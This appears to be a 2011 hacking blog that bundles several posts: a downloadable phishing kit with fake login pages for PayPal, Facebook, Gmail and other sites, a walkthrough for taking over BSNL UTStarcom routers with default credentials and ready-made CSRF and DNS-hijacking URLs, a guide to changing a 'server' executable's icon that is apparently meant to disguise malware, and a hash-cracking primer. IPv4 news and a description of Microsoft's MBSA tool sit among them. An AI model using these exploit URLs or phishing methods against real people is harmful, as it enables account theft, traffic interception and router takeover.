Sunday, April 17, 2011

Social Engineering Ninja - PHP Scripts

S-E Ninja is a Social Engineering tool, with 20-25 popular sites fake pages and anonymous mailer via mail() function in PHP.



Sites included:
amazon.com
digg.com
ebuddy.com
facebook.com
gmail.com
hotmail.com
msn.com (hotmail)
myspace.com
onecard.com (AR,EN Langs)
paypal.com
travian.com (AR,EN Langs)
twitter.com
yahoo.com
youtube.com
xboxlive.com
hotfile.com

features:
popular phishing pages
IP catcher with redirection
Public browser exploitation
Anonymous email sender

Download Social-Engineering Ninja V0.4 (SEN-V0.4.rar) here

Hyenae - A Platform Independent Network Packet Generator

Hyenae is a highly flexible platform independent network packet generator. It allows you to reproduce several MITM, DoS and DDoS attack scenarios, comes with a clusterable remote daemon and an interactive attack assistant.

Hyenae can be used to reveal potential security vulnerabilities of your network. Besides smart wildcard-based address randomization, a highly customizable packet generation control, and an interactive attack assistant, Hyenae comes with a clusterable remote daemon for setting up distributed attack networks.
Hyenae used by security experts to protect their own networks by attack our their networks before someone else does. This tool can be used to evaluate new security devices how it reacts on different types of attacks. For POC of different web applications , network application, database applications and other customized application of your environment.
In small words Hyenae ca be used for stress test of different applications and devices.

note:this tool might look like just another tool but dont go on looks its really powerful and elastic


Download Hyenae v0.36-1 (hyenae-0.36-1.tar.gz/hyenae-0.36-1_fe_0.1-1-win32.exe) here.

PWNING ROUTERS (BSNL)

Today im going to show you how a series of vulnerabilities in a web Application could be creatively exploited.
 
Product Description:
 

The product which i had my hands on is this UTSTARCOM router,

It is one of the most common ADSL Modem cum Router which was rolled out by
BSNL to their customers a year ago, when the number of internet subscribers was reaching the peak. This little devices runs a webserver which serves the web based router configuration application.Further it has a Telnet service running on it.
 
The So Called BuiltIn Security Features :

* Remote Web Access to the router is blocked by Default [so you can't access a victim's router by using his public IP]

* Remote Telnet Access is also blocked

After a little playaround with the device, i've found that there are 3 different users that can login into the router.

viz admin,user,support

The Documentation Provided by
BSNL neither states that there are 3 different users that could access the device nor forces/asks/shows the users to change their default password for accessing the router [Note: Im not mentioning the PPoE Password]

http://www.chennai.bsnl.co.in/BBS/UT300R2U.htm

 
User Description:
As the name suggests, admin user has the ablility to do all configuration changes to the router, whereas the user privileged user could not do any changes in the configuration of the router.

Logged in as Admin:



Logged in as User:


 
Vulnerablility Description:

On a closer examination of the source code,i got hold of a javascript menuBCM.js



menuBCM.js: 
  
  function menuAdmin(options) { // All the options are displayed for ADMIN
   var std = options[MENU_OPTION_STANDARD];
   var proto = options[MENU_OPTION_PROTOCOL];
   var firewall = options[MENU_OPTION_FIREWALL];
   var nat = options[MENU_OPTION_NAT];
   var ipExt = options[MENU_OPTION_IP_EXTENSION];
   var wireless = options[MENU_OPTION_WIRELESS];
   var voice = options[MENU_OPTION_VOICE];
   var snmp = options[MENU_OPTION_SNMP];
   var ddnsd = options[MENU_OPTION_DDNSD];
   var sntp = options[MENU_OPTION_SNTP];
.
.
if ( user == 'admin' ) //this piece of code calls the respective menu to be displayed
      menuAdmin(options);
   else if ( user == 'support' )
      menuSupport(options);
   else if ( user == 'user' )
      menuUser();
}

-------------code truncated
 so it is pretty obvious from the code that the user privilege management is handled by this javacript by displaying all menu's to Admin and hides configuration menu's to the user.

so it is possible to navigate to the configurations page by a user if he knows the URL


The default username password combination is

admin:admin
user:user

Since we know that the user privilege management is handled by a javascript, it has got nothing to do in a telnet session, so when we telnet as either a admin or as a user, we get full access [privilege] to the router.


Further adding fuel to the fire, CSRF is present in the webbased configuration application

 
Exploiting Methods:

First and foremost point is we can't access the victim's router from WAN,


As CSRF vulnerability is present on the router, this script will do the job


http://user:user@192.168.1.1/scsrvcntr.cmd?
action=save&http=1&http=3&icmp=1&snmp=1&snmp=3&telnet=1&telnet=3&tftp=2&tftp=0
 Since there user:user account is some sort of hidden/undisclosed account, the possiblity of its default password being changed is very less.

we could send this link to a victim either in a email or by some SE techniques, what this does is, it changes the router configuration and allows Remote Web access, Remote Telnet access on the router.


The entire Exploit looks like this

1)index.html 


2)config.html


So after the user visits this page, we will have his IP in our database or somewhere depending upon the IP logger script.
Now we can login into his router either by telnetting or by logging into the webapplication.

Even though the victim changes the admin password for the device, we could log in as user:user and navigate into password.html page and viewing source --Kabboomm Plain text passwords in javascripts


passwords.html


So now we got admin access on both TELNET service and webservice, now here comes a variety of exploitation techniques


Possible Attacks:


1.Denial of Service:


1.The attacker might implement MAC filtering or other IP restriction on the victim’s router.

2.Specifying a unreachable Static Route
3.Killing the httpd server process of the router repeatedly by telneting into the victim’s router.
 

2)Sniffing

1.The attacker could specify a static route passing through his network for the victim’s router and sniff the traffic from the victim. [SSL Strip + Ettercap + Wireshark]



3.Phishing:


This is the attack of our special interest as it is one of the stealthiest attack when combined with routing attacks.

The attacker could specify a fake DNS server for the victim router and could carry out phishing attacks.


http://192.168.1.1/dnscfg.cgi?dnsPrimary=XX.XX.XX.XX&dnsSecondary=XX.XX.XX.XX&dnsDynamic=0&dnsRefresh=1
XX.XX.XX.XX = Attackers DNS server

This changes the primary & secondary DNS servers of the victim’s router

Now the victim's network is like this



So we can specify our phishing sites IP address as A Records for famous websites like facebook,orkut,banking sites etc etc in our DNS server...





Greets to:
Author: Boris

ASIA runs out of IPv4 Address

The Asia Pacific Network Information Centre (APNIC) has run out of all but a handful of IPv4 addresses that it is holding in reserve for start-up network operators.
APNIC is the first of the Internet's five regional Internet registries to deplete its free pool of IPv4 address space.
APNIC's news is another sign that CIOs and other IT executives need to begin migrating to IPv6, the long-anticipated upgrade to the Internet's main communications protocol known as IPv4.

"For anybody who hasn't figured out that it's time to do IPv6, this is another wake-up call for them," says Owen DeLong, an IPv6 evangelist at Hurricane Electric and a member of the advisory council of the American Registry for Internet Numbers (ARIN), the North American counterpart to APNIC.
Any CIO who isn't planning for IPv6 is "driving toward a brick wall and closing your eyes and hoping that it's going to disappear before you get there," DeLong says. Ignoring IPv6 "is not the best strategy."
Most IPv4 address space is expected to be handed out by the regional Internet registries by the end of 2011.
IPv4 uses 32-bit addresses and can support 4.3 billion devices connected directly to the Internet. IPv6, on the other hand, uses 128-bit addresses and supports a virtually unlimited number of devices -- 2 to the 128th power.
The Asia Pacific region has been gobbling up the most IPv4 address space in recent years. Geoff Huston, Chief Scientist at APNIC, said APNIC allocated more than 58 million IPv4 addresses in the last two months alone: 41.2 million in March and 16.8 million in April. Among the largest allocations since February 1 were 8.3 million to NTT Communications of Japan, 4.1 million addresses to China Mobile, 4.1 million addresses to KDDI of Japan. and 3.1 million to North Star Information of China. Three other carriers -- India's Bharti Airtel Ltd.,  Pakistan Telecommunications and Chinanet Hunan Province Network -- all received 2 million IPv4 addresses.
APNIC has depleted its IPv4 address space "dramatically faster than people expected," DeLong says. "My guess is that a lot of operators in the Asia Pacific region realized the time of IPv4 depletion was drawing near and they rushed to get their applications in."


APNIC is holding 16.7 million IPv4 addresses -- dubbed a /8 in network engineering terms -- in reserve to distribute in tiny allotments of around 1,000 addresses each to new and emerging IPv6-based networks so they can continue to communicate with the largely IPv4-based Internet infrastructure.
ARIN, which doles out IPv4 and IPv6 address space to companies operating in North America, predicts that it will run out of IPv4 addresses this fall.
"RIPE [the European Internet registry] is going to be the next one to run out. I wouldn't count on them making it until July," DeLong says. "I think ARIN will make it to the end of this year; maybe we'll run out in October or November."

A Brief Intro to Hashes & Salts




 What Is a Hash?


Ok, firstly alot of you still believe that hashes can be "", this is a common
misconception because hashes are generated by One Way Cryptographic Hash Algorithms these means the algorithm
that created them CAN NOT be reversed to determine the plain text password.

These one way functions are used by computers to prevent storing passwords in plain text in memory,
instead when a password is entered (for example at a log in screen) a one way hash algorithm is applied to the supplied password
and then the hashed output is compared to the hash for that user, stored in memory.
If the two hashes match, the passwords are the same and the user is authenticated,
if the two hashes are not the same the passwords do not match and the user is denied access.

Types Of Hashes And How To Identify Them

MD5 - The most common hash you will come across in the wild is an MD5 hash
(Message-Digest algorithm).

These hashes are easily identified by the following factors:
- They are always 32 characters in length (128 Bits)
- They are always hexadecimal (Only use characters 0-9 and A-F)



Example - f5d1278e8109edd94e1e4197e04873b9


If the hash breaks one of these rules - IT IS NOT MD5.

SHA1 - Still used frequently on the internet and is one of a large family of Secure Hash Algorithms.

These hashes are easily identified by the following factors:
- They are always 40 Characters in length (160 bits)
- They are always hexadecimal (Only use characters 0-9 and A-F)


Example - ab4d8d2a5f480a137067da17100271cd176607a1


If the hash breaks one of these rules - IT IS NOT SHA1.

MySQL < 4.1 - These aren't used very often but still come up on very often because people have no idea what to do with them, they are used in older versions of Mysql. These hashes are easily identified by the following factors - They are always 16 Characters in length (64 bits) - They are always hexadecimal (Only use characters 0-9 and A-F) If the hash breaks one of these rules - IT IS NOT MYSQL < 4.1.
Example - 606727496645bcba

MYSQL5 - Used in newer versions of MYSQL to store database user passwords.

These hashes are easily identified by the following factors
- They are always 41 characters in length
- They are always capitalized
- They always begin with an asterisk

If the hash breaks one of these rules - IT IS NOT MYSQL5.


Example - *C8EB599B8E8EE7BE9F1A5691B7BC9ECCB8DE1C75

MD5(Wordpress) - Used in word press driven sites, one of the most commonly confused hashes by everyone

These Hashes are easily identified by the following factors
- They always start with $P$
- They are always variable case alpha numeric (0-9 A-Z a-z)
- The are always 34 characters long

If the hash breaks one of these rules - IT IS NOT MD5(Wordpress).


Example - $P$9QGUsR07ob2qNMbmSCRh3Moi6ehJZR1

MD5(phpBB3) - Used in PHPBB forums, another commonly miss identified hash, especially amongst skids.

These Hashes are easily identified by the following factors
- They always start with $H$
- They are always variable case alpha numeric (0-9 A-Z a-z)
- The are always 34 characters long

If the hash breaks one of these rules - IT IS NOT MD5(PhpBB).

Example - $H$9xAbu5SruQM5WvBldAnS46kQMEw2EQ0


SALTS:-

Ok now there is ALOT of confusion around salts , so im going to try and quickly clean this up - the most commonly salted hash is MD5 because it is cryptographically weak and easy to crack. So a salt gets added to the password before hashing to increase the parity. For example MD5($password.$salt).

Salted MD5 - Used in a large amount of applications to increase hash parity and to increase the time it takes to crack.

These Hashes are easily identified by the following factors
- They consist of two blocks connected by a colon, the first is the hash the second is the salt.
- The first part of the salted hash is hexadecimal, the second is variable case alphanumeric.
- They first part will always be 32 characters long
- The second part can be any length.

If the hash breaks one of these rules - IT IS NOT A SALTED MD5.

Example - 49adee90123f8c77d9020bba968c34dd:PS2en

Warning - in some cases the salt can contain symbols (but this is rare)

NOTE - You need both the salt AND the hash to decrypt a salted md5.


How To Crack Hashes


MD5 - MD5 hashes are easily broken in the present day due to the prevalence of online MD5 crackers such as www.hashchecker.de.
However if you cant crack your hash online then you will need to use a tool such as John The Ripper or more advanced hash crackers
such as Password Pro or HashCat.

Mantra - A Web Based Security Framework



Mantra is a dream that came true for the author. It is a collection of free and open source tools integrated into a web browser – Firefox, which can become handy for students, penetration testers, web application developers, security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software. Mantra is a security framework which can be very helpful in performing all the five phases of attacks including reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access, and covering tracks. Apart from that it also contains a set of tools targeted for web developers and code debuggers which makes it handy for both offensive security and defensive security related tasks.





This is the list of tools included:

  • Access Me
  • Add N Edit Cookies+
  • CookieSwap
  • Domain Details
  • FireFTP
  • FireFlash
  • Firebug
  • Firebug Autocompleter
  • Firecookie
  • Firesheep
  • FormBug
  • FoxyProxy
  • FoxySpider
  • Google Site Indexer
  • Greasemonkey
  • Groundspeed
  • HackBar
  • Host Spy
  • HttpFox
  • JSview
  • JavaScript Deobfuscator
  • Key Manager
  • Library Detector
  • Live HTTP Headers
  • PassiveRecon
  • Poster
  • RESTClient
  • RESTTest
  • RefControl
  • Resurrect Pages
  • SQL Inject ME
  • Selenium IDE
  • Tamper Data
  • URL Flipper
  • User Agent Switcher
  • Vitzo WHOIS
  • Wappalyzer
  • Web Developer
  • XSS Me
  • refspoof
download  Mantra Pre-Alpha 0.01 here

Wednesday, April 13, 2011

Change Your Server File Icon

Change your Servers icon with Reshack

I Decided to write a quick little guide for ResHack.

1.Start of with Downloading ResHack from here: Download ResHack

2.After download,extract and install,i wont go in depth with that,since i guess you all know how to do it

3.After installing, run ResHack as admin

4.Now go to File> Open, or press ctrl+o
Look at Picture Below



 5.Now choose your server,mark it and press open.


6.Now it should look like the Picture below.If not,then redo step 4 and 5.


7.Go to Action> Replace Icon.

8."Press Open file with new icon..." and then go to the icon you want on the server, choose the icon and press "Replace"

9.Now ResHack should look like the picture below if you done anything correctly.




10. Go to File> and press save.




And now you are done.
your server should now have the icon changed.

If you feel like anything needs to be changed, or pointed out better in this thread, please let me know,so i can change it :)




Sunday, April 10, 2011

Web Snake

WebSnake searchs and retrieves files from the Internet. And, pulls files, html, images, and data directly from the internet.

WebSnake supports website mirroring (including directory structure), retrieval of e-mail addresses, site maps and advanced file search. Unlike most of our competitors, WebSnake also supports the industry-standard File Transfer Protocol (FTP)

Download

MBSA (Microsoft Baseline Security Analyzer)

Microsoft Baseline Security Analyzer (MBSA) is an easy-to-use tool designed for the IT professional that helps small- and medium-sized businesses determine their security state in accordance with Microsoft security recommendations and offers specific remediation guidance. Improve your security management process by using MBSA to detect common security misconfigurations and missing security updates on your computer systems.








Download

What You Must Know

MBSA requires the following software to be installed:
  • Windows 2000 SP3 or later, Windows XP (local scans only on computers running Windows XP that use simple file sharing), Windows Server 2003, Windows Vista, or Windows Server 2008
  • The latest Windows Update Agent (WUA) client; MBSA automatically updates computers that need an updated WUA client if the option Configure computers for Microsoft Update and scanning prerequisites is selected.
  • IIS 5.0, 5.1 or 6.0 (required for IIS vulnerability checks)
  • SQL Server 2000 or MSDE 2.0 (required for SQL vulnerability checks)
  • Microsoft Office 2000, Office XP, or Office 2003 (required for Office vulnerability checks)
  • The following services must be installed or enabled: Server service, Workstation service, Remote Registry service, File & Print Sharing, and the DCOM updates and firewall exceptions (required for security update checks)